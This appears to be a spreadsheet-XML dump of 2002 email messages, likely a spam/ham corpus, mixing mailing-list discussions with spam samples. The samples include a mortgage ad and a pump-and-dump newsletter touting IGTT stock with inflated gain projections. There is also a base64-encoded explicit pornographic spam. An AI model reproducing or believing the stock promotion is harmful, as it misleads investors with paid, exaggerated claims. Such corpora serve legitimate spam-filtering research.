 ser0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D178 src=3D"http://61.129.68.1=
 7/mortgage/family.jpg" width=3D312 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D20&gt;&lt;A href=3D"http://marketing-fa=
 shion.com/user0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D20 src=3D"http://6=
 1.129.68.17/mortgage/bb.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D118&gt;&lt;A href=3D"http://marketing-f=
 ashion.com/user0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D118 src=3D"http:/=
 /61.129.68.17/mortgage/text.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D46&gt;&lt;A href=3D"http://marketing-fa=
 shion.com/user0201/index.asp?Afft=3DQM12"&gt;&lt;IMG height=3D46 src=3D"http://6=
 1.129.68.17/mortgage/clickhere.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D450 align=3Dcenter&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D=
 1&gt;=FFFFFFA9 
       Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer l=
 ike us 
       to contact you or feel that you have&lt;BR&gt;received this email in error=
 , 
       please &lt;A href=3D"http://marketing-fashion.com/light/watch.asp"&gt;clic=
 k here to 
       unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall wrote:
 &gt;&gt;From: Stephen D. Williams [mailto:swilliams@hpti.com]
 &gt;&gt;    
 &gt;&gt;
 &gt;&gt;Bush's reluctance to blast blind obeyance of religion as taught by
 &gt;&gt;
 &gt;your
 &gt;  
 &gt;
 &gt;&gt;local madrassa or KKK leader, apparently because he is fully involved
 &gt;&gt;with the general effort to expand unfettered religiosity as the
 &gt;&gt;    
 &gt;&gt;
 &gt;solution 
 &gt;
 &gt;&gt;to the world's ills, is disappointing.  He has spoke against madrassa,
 &gt;&gt;but what I heard sounded lame and carefully crafted to shield religion
 &gt;&gt;in general from scrutiny.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;1. Which religion and how it is currently being expressed matters.
 &gt;
 A)  Which religion is it that can claim no foul actions in its past? 
  Certainly not Christianity, Islam, etc.
 B) "How it is currently being expressed" amounts to a tacit 
 acknowledgement that the sophistication of the society involved and 
 people's self-limiting reasonableness are important to avoid primitive 
 expression.  This leads to the point that religion and less 
 sophisticated societies are a dangerous mix.  It also tends to invoke 
 the image of extremes that might occur without diligent maintenance of 
 society.
 C) Many splinter Christianity religions have 'clean hands' but they also 
 aren't 'found in the wild'.
 (By "primitive expression", I don't mean to slight any society, but that 
 there is some chronic evidence of irrational mob actions and uncivilized 
 behavior (killing infants, women to break religious blue laws, etc.). 
  The US has only really been mostly free of "primitive expression" for 
 40-50 years, although large categories, including serious religious 
 conflict, were settled quite a while ago.)
 D) The Northern Ireland Protestant vs. Catholic feud, recently more or 
 less concluded, is not completely unlike this kind of friction generated 
 by splitting society too much along religious lines.  One Post article 
 pointed out that the problem basically stemmed from the vertical 
 integration of areas along religious lines all the way to schools, 
 government, political party, etc.  (Of course both cases have a heritage 
 of British conquest, but who doesn't?)
 (I couldn't find the article I remember, but here are a couple of others:)
 http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&amp;node=&amp;contentId=A33761-2001Jul8&amp;notFound=true
 http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&amp;node=&amp;contentId=A15956-2002Jul16&amp;notFound=true
 'Northern Ireland is a British province of green valleys and 
 cloud-covered hills whose 1.6 million people are politically and 
 religiously divided. About 54 percent of the population is Protestant, 
 and most Protestants are unionists who want the province to remain part 
 of Britain. The Roman Catholic minority is predominantly republican, or 
 nationalist; they want to merge with the Republic of Ireland to the south.
 In 1968, Catholic leaders launched a civil rights drive modeled on the 
 Rev. Martin Luther King Jr.'s campaign in the American South. But 
 violence quickly broke out, with ancient religious animosities fueling 
 the political argument. Armed paramilitary groups sprung up on both 
 sides. Police records and historians agree that the most lethal group by 
 far was the IRA, fighting on the Catholic side with a goal of a united 
 Ireland
 The provincial police force estimates that about 3,600 people were 
 killed during the 30-year conflict known, with characteristic Northern 
 Ireland understatement, as "The Troubles."'
 &gt;2. The US is trying to avoid making war on the Muslim religion.
 &gt;
 That's fine, as it would be an inappropriate concentration.  It would be 
 difficult to address the issues raised here in a clean way.  I'd be 
 happy with an acknowledgement that the connection is there.
 &gt;3. US Leadership remains reflexively multi-cultural.
 &gt;
 This is ok to a point, as long as it doesn't shy away from logical, 
 objective analysis of when a society could be seriously improved in 
 certain ways.
 &gt;&gt;We all have
 &gt;&gt;disagreements, but at some point it becomes a crime against humanity.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;I didn't say burning the train was a good thing.  I said I understood it
 &gt;wasn't a spontaneous attack on people who had done no wrong.
 &gt;
 True, although I don't think you were as clear originally.  :-)
 sdw
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Telecom Consolidation Begins to Accelerate.................... owwra
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;IGTT&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;img src="http://www.developerhosting.com/lqtracker/imgtrk.asp?id=40165&amp;uid=1290" width="1" height="1" border="0"&gt; 
 &lt;div align="center"&gt;
 &lt;table width="92%" border="1" bordercolor="#333333"&gt;
 &lt;tr&gt; 
 &lt;td height="23"&gt; 
 &lt;div align="center"&gt;
 &lt;div align="center"&gt;
 &lt;div align="center"&gt; 
 &lt;div align="center"&gt;
 &lt;p align="right"&gt;&lt;font color="#000000" size="2" face="Courier New, Courier, mono"&gt;Vol. 
 6, Issue 243 - August 2002&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="6"&gt;&lt;font face="Impact" size="7" color="#FF0000"&gt;The 
 Wall Street Bulletin&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;div align="center"&gt;&lt;font color="#FF0000"&gt;&lt;i&gt;&lt;font size="4" face="Times New Roman, Times, serif"&gt;&lt;b&gt;&lt;font size="3"&gt;Your 
 First Source For News From &amp;quot;The Street&amp;quot;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/i&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;p align="center"&gt;Symbol: &lt;b&gt;&lt;font color="#FF0000"&gt;IGTT&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Shares Outstanding: 373,400,0000&lt;br&gt;
 Float (est.): 52,560,000&lt;br&gt;
 Short-Term Target: $3.75&lt;br&gt;
 52 week High/Low: $1.10/0.02&lt;br&gt;
 Rating: Strong Buy &lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3" color="#000000"&gt;&lt;b&gt;Our last pick 
 Symphony Telecom (OTCBB: SYPY) went UP 100% in just one week!!!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font color="#000000" size="3"&gt;&lt;em&gt;InDigiNet Identifies 
 Acquisition Targets with Combined Revenues of $35 Million...&lt;/em&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Telecom Consolidation Begins to Accelerate 
 &lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="5"&gt;T&lt;/font&gt;he Wall Street Bulletin believes 
 that the &lt;a href="http://moneycentral.msn.com/content/P26293.asp?special=msn"&gt;recent 
 investment of capital into Level 3, lead by Warren Buffett&lt;/a&gt;, 
 is further proof of the continued validity of the telecommunication 
 market when looked at from the perspective of the small to mid-sized 
 enterprises. After the boom and bust comes the revival. For some 
 carriers drowning in debt, such as Global Crossing and WorldCom, 
 the future may be dim. But for those survivors of the industry 
 that have managed to remain on their feet, other companies' problems 
 mean opportunity. &amp;quot;Every major industry in the history of 
 the United States has experienced a similar transformation, from 
 the railroads in the late 1800s to the automakers in the mid-1900s 
 to the Dot-Coms at the end of the 20th century,&amp;quot; says &lt;a href="http://www.commweb.com/article/COM20010403S0001"&gt;Robert 
 Saunders&lt;/a&gt;, director of the Eastern Management Group market 
 research firm. &lt;a href="http://www.eftia.com/about/exec/dean.html"&gt;Christopher 
 Dean&lt;/a&gt;, CTO of OSS company Eftia, says &amp;quot;We are seeing all 
 the people that are the survivors. There's all this pent-up money 
 and for the surviving carriers out there, they can get what used 
 to cost a few billion for a few millions.&amp;quot; &lt;em&gt;Read the full 
 story from Telecommunications Magazine - See the link at the end 
 of this newsletter.&lt;/em&gt; &lt;/p&gt;
 &lt;p align="left"&gt;As we write this report, our New Recommendation 
 InDigiNet, Inc. (&lt;a href="http://moneycentral.msn.com/scripts/webquote.dll?ipage=qd&amp;Symbol=igtt&amp;SUBMIT1=Go"&gt;OTCBB: 
 IGTT&lt;/a&gt;) has only been trading on the OTC Bulletin Board since 
 late May of 2002. As InDigiNet, Inc. continues to implement its 
 business plan, we believe this company will help lead the way 
 up for the resurgence of the Telecom Sector. This could be our 
 strongest recommendation of the year. We are giving IGTT our Highest 
 Rating of STRONG BUY/AGGRESSIVE GROWTH.&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Ground Floor Opportunity / Tremendous 
 Growth Potential &lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;We believe IGTT will perform equally to, if not 
 greater than its competition. A similar telecommunications company, 
 Talk America Holdings (Nasdaq: TALK), &lt;a href="http://bigcharts.marketwatch.com/quickchart/quickchart.asp?symb=talk&amp;sid=0&amp;o_symb=talk&amp;freq=1&amp;time=7"&gt;share 
 price began to explode in April of this year moving from just 
 over $0.40/share to over $4.00/share in late June&lt;/a&gt;. Talk America 
 Holdings previously had a market cap of only $24.51 million, but 
 today has a market cap of $267 million.&lt;/p&gt;
 &lt;p align="left"&gt;IGTT curently has a market cap of $22.42 million. 
 Using the TALK model for potential growth, IGTT could very well 
 be trading in the .60 range in only a few months, with a market 
 cap in excess of $250 million. This would be an increase of 1000%. 
 So you see why IGTT has such great potential and the time is right 
  for investors to get in on the ground floor.&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;The &lt;em&gt;InDigNet&lt;/em&gt; Strategy&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;InDigiNet, Inc. is an integrated solutions company 
 that provides small to mid-sized enterprises (SMEs) with an integrated 
 communication solution. InDigiNet is a prestigious &lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B35CA79AF-6477-4734-90E1-97EC3455E773%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;&amp;quot;Diamond&amp;quot; 
 level partner of Avaya&lt;/a&gt;, as well as a reseller for Cisco and 
 Compaq. The Company will offer data, local, long distance and 
 wireless services to SMEs over third party networks enabling the 
 Company to offer a comprehensive suite of services without the 
 capital burden of building a communication network. The Company&amp;#8217;s 
 strategy is to acquire the customer bases of smaller, single market 
 communication companies and attractively priced &lt;a href="http://webopedia.com/TERM/I/ISP.html"&gt;Internet 
 Service Providers &lt;/a&gt;(ISPs). &lt;em&gt;The Company recently completed 
 its acquisitions of Fox Telecommunications and WBConnect&lt;/em&gt;. 
 InDigiNet will then expand the breadth of their services to grow 
 revenue and enhance profitability. SMEs account for $120 billion 
 in commercial telephony, data services and technology spending, 
 or 33% of the country&amp;#8217;s total market, and this spending 
 is expected to grow at above average rates over the next ten years. 
 &lt;em&gt;Source: Morgan Stanley Dean Witter&lt;/em&gt;. &lt;/p&gt;
 &lt;p align="left"&gt;The IGTT web site: &lt;a href="http://www.indiginet.com"&gt;www.indiginet.com&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;The&lt;em&gt; &lt;/em&gt;IT Market&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;Based on recent studies, the country&amp;#8217;s 7.4 
 million SMEs currently lag significantly in the utilization of 
 &lt;a href="http://webopedia.com/TERM/I/IT.html"&gt;IT&lt;/a&gt; and data 
 communications, including Internet access, web services, business 
 software and e-commerce. Worldwide IT spending increased to $981 
 billion US for the year, an overall increase of 3.7 percent over 
 2001, according to a study released 7/24/2002 by market researcher 
 IDC. IT spending in 2003 is expected to reach record heights, 
 growing by 9 percent worldwide to top the $1 trillion mark for 
 the first time. In IDC's revised forecasts for IT spending in 
 2002 and 2003, IT spending in the US is expected to increase by 
 3 percent this year over 2001 to $436 billion, with further growth 
 of 9 percent in 2003. Western Europe can expect growth of 4 percent 
 in 2002 and 6 percent in 2003. Though Japan will experience flat 
 growth levels this year, by next year growth in the market will 
 return to the tune of 7 percent with particular strength shown 
 in China, India, Korea, Russia, the Philippines, South Africa 
 and Poland. &lt;em&gt;Source: &lt;a href="http://www.idc.com/en_US/st/aboutIDC.jhtml;jsessionid=2J2GJSTTFNK4MCTFA4FCFGAKMUDYWIWD"&gt;IDC&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Particulars&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;The Wall Street Bulletin is putting IGTT on our 
 Strong Buy/Aggressive Growth recommendation list for the following 
 reasons:&lt;/p&gt;
 &lt;p align="left"&gt;1. The Company's strategy is to acquire the customer 
 bases of smaller, single-market communication companies and attractively 
 priced Internet Service Providers (ISPs). The Company will sell 
 its bundled service package to the acquired customer base that 
 will form a direct and immediate distribution channel for all 
 types of communication services - local, long distance, wireless, 
 and data. &lt;/p&gt;
 &lt;p align="left"&gt;&lt;br&gt;
 2. The Company is currently serving many customers in the Denver/Front 
 Range communities but in particular the education vertical market 
 has recognized the value of integrating a wireless broadband data 
 network into the existing campus network. The Company's customers 
 include &lt;a href="http://www.usoc.org/"&gt;United States Olympic Committee&lt;/a&gt; 
 (USOC), &lt;a href="http://www.du.edu/"&gt;University of Denver&lt;/a&gt;, 
 and &lt;a href="http://www.colostate.edu/"&gt;Colorado State University&lt;/a&gt;. 
 &lt;/p&gt;
 &lt;p align="left"&gt;&lt;br&gt;
 3. The Company has identified approximately $35,000,000 in revenues 
 to acquire comprised of distressed assets to be auctioned in bankruptcy 
 court and smaller communication providers with valuable customer 
 bases. Each of the targeted companies are within the Company's 
 footprint and will, subject to purchase completion, increase the 
 Company's embedded customer base. &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;strong&gt;Investment Consideration&lt;/strong&gt;&lt;/p&gt;
 &lt;p align="left"&gt;InDigiNet Inc recently filed its 10QSB, for the 
 three months ended March 31, 2002. IGTT reported Revenues of $339,694 
 in Q1 2002 vs. Revenues of $0 in Q1 2001. At this current growth 
 rate, revenues should grow above $1.3 million for their first 
 year of production with no increases in acquisitions. As more 
 and more large corporations come under government scrutiny, investors 
 will turn to small to mid-sized companies with their investment 
 dollars. &lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - InDigiNet, Inc. Completes Acquisition of 
 Fox Telecommunications, Inc. - &lt;em&gt;PRNewswire - &lt;/em&gt;&lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B42FC3A33-75F2-4246-AFBE-0FF24082C128%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - InDigiNet, Inc. Completes Acquisition of 
 WBConnect&lt;em&gt; - PRNewswire&lt;/em&gt; - &lt;a href="http://tools.thestreet.com/tsc/quotes.html?pg=qcn&amp;guid=%7B5877DA16-41D7-4F15-942D-BE31B81F38A7%7D&amp;symb=igtt&amp;sid=692861&amp;orig=1&amp;timer="&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;NEWS - Telecom Consolidation Begins to Accelerate 
 - from &lt;em&gt;Telecommunications Magazin&lt;/em&gt;e - &lt;a href="http://www.telecomflash.com/default.asp?journalid=5&amp;func=articles&amp;page=070205&amp;year=2002&amp;month=7&amp;rsno=5"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;Industry Interests - Telecommunications Websites: 
 &lt;a href="http://www.tiaonline.org/"&gt;TIA Online&lt;/a&gt; - &lt;a href="http://www.telecoms-mag.com/"&gt;Telecommunications 
 Magazine&lt;/a&gt; - &lt;a href="http://www.itworld.com/"&gt;IT World&lt;/a&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;&lt;b&gt;&lt;font color="#666666"&gt;The Wall 
 Street Bulletin is an independent newsletter and is not affiliated 
 with InDigiNet, Inc.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font size="1"&gt;The Wall Street Bulletin is an independent 
 research firm. This report is based on The Wall Street Bulletin&amp;#8217;s 
 independent analysis but also relies on information supplied by 
 sources believed to be reliable. This report may not be the opinion 
 of IGTT management. The Wall Street Bulletin has also been retained 
 to research and issue reports on IGTT and was paid ten thousand 
 dollars by a shareholder of the company. The Wall Street Bulletin 
 may from time to time buy or sell IGTT common shares in the open 
 market without notice. The information contained in this report 
 is not intended to be, and shall not constitute, an offer to sell 
 or solicitation of any offer to buy any security. It is intended 
 for information only. Some statements may contain so-called &amp;#8220;forward-looking 
 statements&amp;#8221;. Many factors could cause actual results to 
 differ. Investors should consult with their Investment Advisor 
 concerning IGTT. Copyright 2002 &amp;copy; The Wall Street Bulletin 
 - All Rights Reserved&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="3"&gt;I no longer wish to receive your 
 newsletter &lt;a href="mailto:nomoreigtt2@444.net"&gt;&lt;b&gt;CLICK 
 HERE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="right"&gt;&lt;font color="#000000" size="3"&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ikxrkobewgotpevemtbokjgssytdinm
</t>
  </si>
  <si>
    <t xml:space="preserve">What I meant was that neither he nor anyone else has any *authority* to 
 say something can or can't be published, and make that stick, at least 
 in the US, and from some descriptions, France. Of course he can say 
 anything he wants. And I can choose to ignore it, or not. Works both 
 ways.
 Fscking semantics.
 Chuck
 On Thursday, September 19, 2002, at 06:41 AM, Russell Turpin wrote:
 &gt; Robert Harley:
 &gt;&gt;&gt; BTW, I wasn't aware that the 1st Amendment mandated that crap must be 
 &gt;&gt;&gt; FoRKed.
 &gt;
 &gt; Chuck Murcko &lt;chuck@topsail.org&gt;:
 &gt;&gt; It doesn't, BTW. It says the right to free speech shall not be 
 &gt;&gt; abridged. That means *you* can't say anything may not be FoRKed or 
 &gt;&gt; printed or whatever.
 &gt;
 &gt; Actually, it means just the opposite. The first
 &gt; amendment guarantees Harley's right to say just
 &gt; that. For the outlets where he has editorial
 &gt; control, it even guarantees his right to CENSOR
 &gt; content published through those outlets. The
 &gt; first amendment doesn't limit Harley's speech,
 &gt; and it is neutral with regard to the selection
 &gt; policies of FoRK and other private venues.
 &gt;
 &gt;
 &gt;
 &gt; _________________________________________________________________
 &gt; MSN Photos is the easiest way to share and print your photos: 
 &gt; http://photos.msn.com/support/worldwide.aspx
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">One more congratulation from me, Tim. Why 'Ro' instead of 'Rose' as a short
 form of 'Rosemary'? Is it a Welsh thing?
 Bill
 William Jacobs
 Sporadically Underemployed Person
 I wish to God these calculations had been executed by steam! - Charles
 Babbage
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hottest babes!                                                       4139YAEk3--9
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A5_78C83A6B.A1543A16
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 MzU0NHRqVFIwLTM5NUZLa20zNjkyYUN6QjUtNDQ5cGVsMzANCjxodG1sPjxi
 b2R5IGxpbms9I0ZGRkYwMCB2bGluaz0jRkZGRjAwIGFsaW5rPSNGRkZGMDAg
 dGV4dD0jRkZGRjAwIGJnY29sb3I9IzAwMDAwMD4gPHRhYmxlIGJvcmRlckNv
 bG9yPSMwMDAwMDAgd2lkdGg9NjAwIGFsaWduPWNlbnRlciBiZ0NvbG9yPSM2
 Njk5MzMgYm9yZGVyPTM+PHRyPjx0ZCBhbGlnbj1taWRkbGU+PGZvbnQgZmFj
 ZT1BcmlhbCxIZWx2ZXRpY2Esc2Fucy1zZXJpZj48YnI+IDxmb250IGNvbG9y
 PXdoaXRlIHNpemU9KzM+PGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNoLm5l
 dC93ZXRiaXRzL2luZGV4Lmh0bT5XZXRiaXRzPC9hPjwvZm9udD48L2ZvbnQ+
 PGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC93ZXRiaXRzL2luZGV4
 Lmh0bT4gPC9hPjxwPjxmb250IGZhY2U9QXJpYWwsSGVsdmV0aWNhLHNhbnMt
 c2VyaWYgY29sb3I9I2ZmZmYwMCBzaXplPTM+PGI+IEdvbGRlbiBTaG93ZXIg
 RXh0cmF2YWdhbnphPC9iPjwvZm9udD48Zm9udCBmYWNlPUFyaWFsLEhlbHZl
 dGljYSxzYW5zLXNlcmlmPjxicj4gPGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1h
 dGNoLm5ldC93ZXRiaXRzL2luZGV4Lmh0bT4gPGZvbnQgY29sb3I9eWVsbG93
 IHNpemU9KzI+RU5URVIhPC9mb250PjwvYT48L3A+IDx0YWJsZSB3aWR0aD01
 MDAgYWxpZ249Y2VudGVyPjx0cj48dGQgYWxpZ249bWlkZGxlPjxmb250IGNv
 bG9yPXdoaXRlIHNpemU9KzM+VW5iZWxpZXZhYmxlIFNleCBBY3RzITwvZm9u
 dD48YnI+IDxhIGhyZWY9aHR0cDovL3d3dy54eHhtYXRjaC5uZXQvd2V0Yml0
 cy9pbmRleC5odG0+IDxmb250IGNvbG9yPXllbGxvdyBzaXplPSs0PlNoZSBD
 YW4gUGVlIEFsbCBEYXk8L2ZvbnQ+PC9hPjxicj4gPGZvbnQgY29sb3I9Ymxh
 Y2sgc2l6ZT0rMj5Db2NrIGNyYXZpbmcgdGVlbnMgc3F1aXJtIGFyb3VuZCBj
 b3ZlcmVkIGluIHBlZSB3aXRoIGEgdGhyb2JiaW5nIGNvY2sgYnVyaWVkIHRv
 IHRoZSBoaWx0LiBTbGlwcGVyeSBhbmFsIHdob3JlcyBnZXR0aW5nIHdldCE8
 YnI+IDxmb250IHNpemU9KzMgZWxsb3c+U3ByZWFkICdlbSA8L2ZvbnQ+PC9m
 b250PiA8Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0rMz5QZWU8L2ZvbnQ+PGZv
 bnQgY29sb3I9YmxhY2sgc2l6ZT0rMj48Zm9udCBjb2xvcj15ZWxsb3cgc2l6
 ZT0rMz5naXJsITwvZm9udD48YnI+IDxhIGhyZWY9aHR0cDovL3d3dy54eHht
 YXRjaC5uZXQvd2V0Yml0cy9pbmRleC5odG0+IDxmb250IGNvbG9yPXllbGxv
 dyBzaXplPSs0PkVudGVyITwvZm9udD48L2E+PC9mb250PjwvdGQ+PC90cj4g
 PC90YWJsZT4gPHRhYmxlIHdpZHRoPTUwMCBhbGlnbj1jZW50ZXI+PHRyPjx0
 ZCBhbGlnbj1taWRkbGU+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0rMT5TZXgg
 Y3JhemVkIHBlZWdpcmxzIHJpZGUgY29jayBhbGwgZGF5IHdoaWxlIHBpc3Np
 bmcgZm91bnRhaW5zIG9uIHRoZWlyIHBhcnRuZXJzLiBQZWVnaXJscyB0aGF0
 IGNhbid0IGdldCBlbm91Z2ggY3VtLCBzdWNraW5nIG9mZiBkaWNrIGFmdGVy
 IGRpY2suIEhvcm55IHNsdXRzIHNwcmVhZGluZyB0aGVtIGZvciBldmVyeSBU
 b20sIERpY2sgYW5kIENvY2sgdG8gY29tZSBpbiEgPC9mb250PjwvdGQ+PC90
 cj4gPC90YWJsZT4gPHRhYmxlIGJvcmRlckNvbG9yPWJsYWNrIGJvcmRlckNv
 bG9yRGFyaz1ibGFjayBhbGlnbj1jZW50ZXIgYm9yZGVyQ29sb3JMaWdodD1y
 ZWQgYm9yZGVyPTI+PHRyPjx0ZCBhbGlnbj1taWRkbGUgd2lkdGg9MjAwPiA8
 YSBocmVmPWh0dHA6Ly93d3cueHh4bWF0Y2gubmV0L3dldGJpdHMvaW5kZXgu
 aHRtPiA8Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0rMT5VbHRyYS1IYXJkY29y
 ZSBBY3Rpb24gPC9mb250PjwvYT48L3RkPjx0ZCBhbGlnbj1taWRkbGUgd2lk
 dGg9MjAwPiA8YSBocmVmPWh0dHA6Ly93d3cueHh4bWF0Y2gubmV0L3dldGJp
 dHMvaW5kZXguaHRtPiA8Zm9udCBjb2xvcj15ZWxsb3cgc2l6ZT0rMT5UZWVu
 YWdlIFBlZWdpcmxzIDwvZm9udD48L2E+PC90ZD48dGQgYWxpZ249bWlkZGxl
 IHdpZHRoPTIwMD4gPGEgaHJlZj1odHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC93
 ZXRiaXRzL2luZGV4Lmh0bT4gPGZvbnQgY29sb3I9eWVsbG93IHNpemU9KzE+
 V2lsZCBQZWUgUGFydGllcyA8L2ZvbnQ+PC9hPjwvdGQ+PC90cj48dHI+PHRk
 IGFsaWduPW1pZGRsZSB3aWR0aD0yMDA+IDxhIGhyZWY9aHR0cDovL3d3dy54
 eHhtYXRjaC5uZXQvd2V0Yml0cy9pbmRleC5odG0+IDxmb250IGNvbG9yPXll
 bGxvdyBzaXplPSsxPkJpemFycmUgVmlkZW9zIDwvZm9udD48L2E+PC90ZD48
 dGQgYWxpZ249bWlkZGxlIHdpZHRoPTIwMD4gPGEgaHJlZj1odHRwOi8vd3d3
 Lnh4eG1hdGNoLm5ldC93ZXRiaXRzL2luZGV4Lmh0bT4gPGZvbnQgY29sb3I9
 eWVsbG93IHNpemU9KzE+SWxsZWdhbCBBY3Rpb24gPC9mb250PjwvYT48L3Rk
 Pjx0ZCBhbGlnbj1taWRkbGUgd2lkdGg9MjAwPiA8YSBocmVmPWh0dHA6Ly93
 d3cueHh4bWF0Y2gubmV0L3dldGJpdHMvaW5kZXguaHRtPiA8Zm9udCBjb2xv
 cj15ZWxsb3cgc2l6ZT0rMT5IaWRkZW4gUGVlIENhbXMgPC9mb250PjwvYT48
 L3RkPjwvdHI+IDwvdGFibGU+PHA+PGJyPiA8YSBocmVmPWh0dHA6Ly93d3cu
 eHh4bWF0Y2gubmV0L3dldGJpdHMvaW5kZXguaHRtPiA8Zm9udCBjb2xvcj15
 ZWxsb3cgc2l6ZT0rMz5FbnRlciBXZXRiaXRzPC9mb250PjwvYT48YnI+PGJy
 PiAmbmJzcDs8L2ZvbnQ+PC90ZD48L3RyPiA8L3RhYmxlPjwvYm9keT48L2h0
 bWw+DQo1NDE4WlRRSTAtNjAyb0pUbzk3MDR0TXZJMC05MTZ1TktINjQyNEF0
 WUM0LTQ4NFVVY3UxMzU4T0VlQjItbDU3
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ed Cone: "The House Subcommittee on Courts, the Internet, and
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:12:25:19PM
 Date: Wed, 25 Sep 2002 19:25:19 GMT
 Ed Cone[1]: "The House Subcommittee on Courts, the Internet, and Intellectual 
 Property will hold a hearing on 'Piracy of Intellectual Property on 
